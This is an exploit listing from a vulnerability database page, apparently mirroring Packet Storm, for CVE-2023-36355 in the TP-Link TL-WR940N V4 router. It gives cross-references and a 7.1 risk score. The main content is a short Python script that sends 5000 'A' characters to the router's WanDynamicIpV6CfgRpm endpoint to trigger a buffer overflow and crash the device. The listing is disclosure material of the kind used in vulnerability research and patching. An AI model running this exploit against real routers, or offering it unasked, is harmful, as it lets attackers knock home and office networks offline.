TP-Link TL-WR940N 4 Buffer Overflow

🗓️ 03 Jul 2023 00:00:00Reported by Amirhossein BahramizadehType

packetstorm🔗 packetstormsecurity.com👁 169 Views

TP-Link TL-WR940N V4 Buffer Overflow on WAN Dynamic IP Configuratio

Reporter	Title	Published	Views	Family All 11
0day.today	TP-Link TL-WR940N V4 - Buffer OverFlow Exploit	4 Jul 202300:00	–	zdt
ATTACKERKB	CVE-2023-36355	22 Jun 202320:15	–	attackerkb
BDU FSTEC	The vulnerability of the WanDynamicIpV6CfgRpm component (/userRpm/WanDynamicIpV6CfgRpm.htm) in the TP-Link TL-WR940N router software allows a attacker to cause a service failure.	11 Jul 202300:00	–	bdu_fstec
CNNVD	TP-Link TL-WR940N 安全漏洞	22 Jun 202300:00	–	cnnvd
CVE	CVE-2023-36355	22 Jun 202300:00	–	cve
Cvelist	CVE-2023-36355	22 Jun 202300:00	–	cvelist
Exploit DB	TP-Link TL-WR940N V4 - Buffer OverFlow	3 Jul 202300:00	–	exploitdb
NVD	CVE-2023-36355	22 Jun 202320:15	–	nvd
Prion	Buffer overflow	22 Jun 202320:15	–	prion
Positive Technologies	PT-2023-3441 · Tp Link · Tp-Link Tl-Wr940N	20 Jun 202300:00	–	ptsecurity

`# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow  
# Date: 2023-06-30  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : hardware  
# Dork : /userRpm/WanDynamicIpV6CfgRpm  
# Tested on: Windows/Linux  
# CVE : CVE-2023-36355  
  
import requests  
  
# Replace the IP address with the router's IP  
router_ip = '192.168.0.1'  
  
# Construct the URL with the vulnerable endpoint and parameter  
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='  
  
# Replace the payload with a crafted payload that triggers the buffer overflow  
payload = 'A' * 5000 # Example payload, adjust the length as needed  
  
# Send the GET request with the crafted payload  
response = requests.get(url + payload)  
  
# Check the response status code  
if response.status_code == 200:  
print('Buffer overflow triggered successfully')  
else:  
print('Buffer overflow not triggered')  
  
  
`

03 Jul 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.31733